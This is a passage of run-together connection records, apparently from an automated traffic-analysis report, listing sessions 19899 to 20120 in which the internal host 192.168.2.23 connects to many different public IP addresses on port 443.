                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19899192.168.2.234284624.128.63.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19900192.168.2.2335330104.54.228.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19901192.168.2.2354746173.137.164.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19902192.168.2.234418663.118.71.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19903192.168.2.234930276.150.48.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19904192.168.2.234244099.16.184.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19905192.168.2.236017878.95.85.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19906192.168.2.234242691.121.191.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19907192.168.2.2352324207.178.37.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19908192.168.2.2360844137.236.65.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19909192.168.2.233539874.6.95.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19910192.168.2.233767232.190.197.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19911192.168.2.2346060177.151.146.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19912192.168.2.2334218218.63.151.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19913192.168.2.2348672118.203.94.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19914192.168.2.235398227.133.35.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19915192.168.2.234025838.233.10.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19916192.168.2.234343699.232.210.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19917192.168.2.2341204199.248.133.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19918192.168.2.2339624124.51.95.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19919192.168.2.2350874107.74.14.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19920192.168.2.2355128206.102.76.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19921192.168.2.235988878.230.251.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19922192.168.2.2353100169.246.84.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19923192.168.2.234623480.163.90.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19924192.168.2.2341032166.210.98.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19925192.168.2.2360582134.130.122.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19926192.168.2.2348436218.180.233.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19927192.168.2.234913854.68.175.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19928192.168.2.2347500146.158.227.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19929192.168.2.235938420.60.81.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19930192.168.2.234612852.117.45.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19931192.168.2.236080419.187.3.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19932192.168.2.233540441.21.145.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19933192.168.2.235259641.217.245.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19934192.168.2.234389299.74.134.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19935192.168.2.2336886143.2.177.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19936192.168.2.2357264136.146.217.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19937192.168.2.2360154157.84.250.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19938192.168.2.235141272.115.234.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19939192.168.2.234344685.60.184.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19940192.168.2.2335064222.59.218.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19941192.168.2.2342518194.227.20.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19942192.168.2.2343538121.239.160.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19943192.168.2.2345770178.122.147.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19944192.168.2.233880860.0.140.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19945192.168.2.235487081.75.160.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19946192.168.2.234415631.6.121.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19947192.168.2.2360634219.122.88.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19948192.168.2.2353854203.4.127.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19949192.168.2.235901278.151.240.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19950192.168.2.234362051.217.61.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19951192.168.2.2356958103.142.5.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19952192.168.2.235889890.126.99.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19953192.168.2.234424897.99.174.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19954192.168.2.2348128175.48.186.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19955192.168.2.2345780216.224.48.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19956192.168.2.2357748195.127.55.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19957192.168.2.2332802135.246.54.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19958192.168.2.2349132134.0.180.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19959192.168.2.2351356162.6.43.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19960192.168.2.233364082.227.144.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19961192.168.2.2353004217.233.141.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19962192.168.2.235461636.109.124.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19963192.168.2.2356746205.153.105.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19964192.168.2.2348306104.22.179.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19965192.168.2.2338992116.169.208.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19966192.168.2.234892424.30.67.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19967192.168.2.234321853.208.100.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19968192.168.2.2352598149.169.49.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19969192.168.2.2340790203.69.120.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19970192.168.2.2354170205.248.186.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19971192.168.2.2354662189.57.237.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19972192.168.2.235111031.149.179.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19973192.168.2.2350222190.166.77.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19974192.168.2.234538463.248.128.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19975192.168.2.234987681.54.184.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19976192.168.2.2342962175.80.141.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19977192.168.2.2356010211.32.249.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19978192.168.2.2346784104.92.244.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19979192.168.2.234901264.50.40.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19980192.168.2.235523435.200.7.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19981192.168.2.2355234184.2.215.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19982192.168.2.234101098.253.83.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19983192.168.2.234618854.224.119.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19984192.168.2.235379082.181.13.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19985192.168.2.235333489.41.252.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19986192.168.2.2342588103.120.103.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19987192.168.2.2349276132.135.198.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19988192.168.2.236045070.192.76.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19989192.168.2.2342048222.171.244.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19990192.168.2.2353912168.152.146.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19991192.168.2.235686418.138.177.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19992192.168.2.2348588102.163.79.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19993192.168.2.2351070158.182.223.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19994192.168.2.234692650.100.246.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19995192.168.2.234333275.235.203.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19996192.168.2.2334658170.178.145.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19997192.168.2.2354982145.252.208.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19998192.168.2.2356268219.163.48.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19999192.168.2.233906842.137.217.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20000192.168.2.2344774142.250.210.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20001192.168.2.2334910154.255.10.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20002192.168.2.2332982195.224.196.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20003192.168.2.2359166220.166.10.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20004192.168.2.2348786152.188.142.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20005192.168.2.2337702202.22.247.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20006192.168.2.235292672.10.84.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20007192.168.2.2352342124.41.62.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20008192.168.2.236029685.215.169.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20009192.168.2.2351148144.142.35.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20010192.168.2.2353386142.72.149.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20011192.168.2.234542488.32.127.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20012192.168.2.2342864110.139.56.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20013192.168.2.2347488209.212.126.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20014192.168.2.234624058.237.100.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20015192.168.2.2359274201.212.63.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20016192.168.2.2339286213.242.241.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20017192.168.2.2336076153.39.108.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20018192.168.2.233928069.249.115.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20019192.168.2.234270217.195.92.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20020192.168.2.234854838.204.166.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20021192.168.2.2353104192.39.178.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20022192.168.2.2350328195.172.164.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20023192.168.2.235614469.195.210.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20024192.168.2.2344822141.88.151.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20025192.168.2.2338846166.234.10.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20026192.168.2.2338660193.30.187.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20027192.168.2.235719414.122.223.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20028192.168.2.2343336152.15.99.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20029192.168.2.234795843.0.110.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20030192.168.2.234885262.147.107.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20031192.168.2.2357332147.148.112.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20032192.168.2.2354552145.240.49.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20033192.168.2.233561414.160.32.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20034192.168.2.2344744194.219.55.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20035192.168.2.23607925.126.45.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20036192.168.2.2356660184.207.9.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20037192.168.2.2337586124.172.215.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20038192.168.2.235713669.239.21.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20039192.168.2.235653238.78.238.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20040192.168.2.2352646223.222.105.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20041192.168.2.235777096.179.168.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20042192.168.2.2360406169.164.78.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20043192.168.2.2356808166.64.181.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20044192.168.2.2355404126.155.46.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20045192.168.2.2353030140.23.186.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20046192.168.2.2342970113.221.240.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20047192.168.2.235516283.117.159.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20048192.168.2.234601035.198.193.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20049192.168.2.234085414.189.178.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20050192.168.2.2341266194.142.231.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20051192.168.2.2355122116.95.108.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20052192.168.2.23422464.153.156.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20053192.168.2.2336038142.125.11.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20054192.168.2.233921238.177.144.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20055192.168.2.233285469.137.207.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20056192.168.2.233463639.8.16.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20057192.168.2.2357160133.62.212.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20058192.168.2.2360240194.2.66.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20059192.168.2.236081875.35.157.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20060192.168.2.2349766190.22.235.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20061192.168.2.233302664.229.180.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20062192.168.2.2334564140.137.177.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20063192.168.2.234733696.215.85.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20064192.168.2.234302835.24.153.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20065192.168.2.234530883.154.181.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20066192.168.2.235004063.138.64.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20067192.168.2.234547697.25.72.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20068192.168.2.2347162212.140.86.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20069192.168.2.2356944193.228.123.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20070192.168.2.234377647.14.235.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20071192.168.2.235649665.82.254.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20072192.168.2.233943072.93.159.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20073192.168.2.233287450.90.156.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20074192.168.2.235579689.215.224.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20075192.168.2.2359616149.132.205.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20076192.168.2.234420671.4.225.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20077192.168.2.2347040166.7.67.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20078192.168.2.2342698117.132.198.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20079192.168.2.2344934171.56.141.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20080192.168.2.234459873.156.93.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20081192.168.2.2336224132.123.131.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20082192.168.2.235499841.97.217.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20083192.168.2.234973245.189.15.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20084192.168.2.233938248.43.159.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20085192.168.2.2339816138.129.66.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20086192.168.2.2360604101.106.19.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20087192.168.2.234016625.28.14.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20088192.168.2.2344658146.133.17.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20089192.168.2.234263612.190.118.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20090192.168.2.2357036145.83.145.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20091192.168.2.234836894.35.250.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20092192.168.2.2355790166.37.255.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20093192.168.2.2339518141.46.161.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20094192.168.2.2335450170.93.30.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20095192.168.2.2355344223.51.149.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20096192.168.2.2347404106.91.208.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20097192.168.2.2341734129.229.38.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20098192.168.2.2350112167.63.155.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20099192.168.2.2334438206.100.184.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20100192.168.2.2351680157.194.80.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20101192.168.2.2339124118.25.222.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20102192.168.2.236092024.144.75.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20103192.168.2.2340612184.216.159.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20104192.168.2.2356646188.48.138.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20105192.168.2.2342434182.16.154.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20106192.168.2.2336968114.155.160.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20107192.168.2.2341770175.238.255.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20108192.168.2.2336556135.155.145.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20109192.168.2.234087062.79.121.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20110192.168.2.2332902128.251.7.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20111192.168.2.2334318133.151.148.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20112192.168.2.233413031.170.189.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20113192.168.2.234213841.239.205.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20114192.168.2.234721654.40.205.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20115192.168.2.2335500155.225.3.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20116192.168.2.234406437.190.170.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20117192.168.2.2349878190.124.124.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20118192.168.2.233861096.96.53.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20119192.168.2.2333586100.11.123.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20120192.168.2.2334638159.211.117.143443
